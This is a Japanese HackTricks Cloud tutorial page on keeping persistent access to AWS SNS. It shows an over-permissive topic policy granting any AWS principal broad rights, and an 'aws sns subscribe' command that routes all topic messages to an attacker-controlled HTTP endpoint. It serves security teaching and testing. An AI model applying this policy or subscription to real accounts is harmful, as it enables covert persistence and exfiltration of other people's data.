Japanese - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - SNS Persistence

HackTricksをサポートする

SNS

詳細については、以下を確認してください:

AWS - SNS Enum

Persistence

SNSトピックを作成する際には、IAMポリシーで誰が読み書きするアクセス権を持つかを示す必要があります。外部アカウント、ロールのARN、または**"*"を指定することも可能です。 以下のポリシーは、AWS内のすべての人にMySNS.fifo**というSNSトピックへの読み書きアクセスを与えます:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Create Subscribers

すべてのトピックからすべてのメッセージを引き続き抽出するために、攻撃者はすべてのトピックのためにサブスクライバーを作成することができます。

トピックがFIFOタイプの場合、SQSプロトコルを使用するサブスクライバーのみが使用できます。

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
HackTricksをサポートする
PreviousAWS - S3 PersistenceNextAWS - Secrets Manager Persistence

Last updated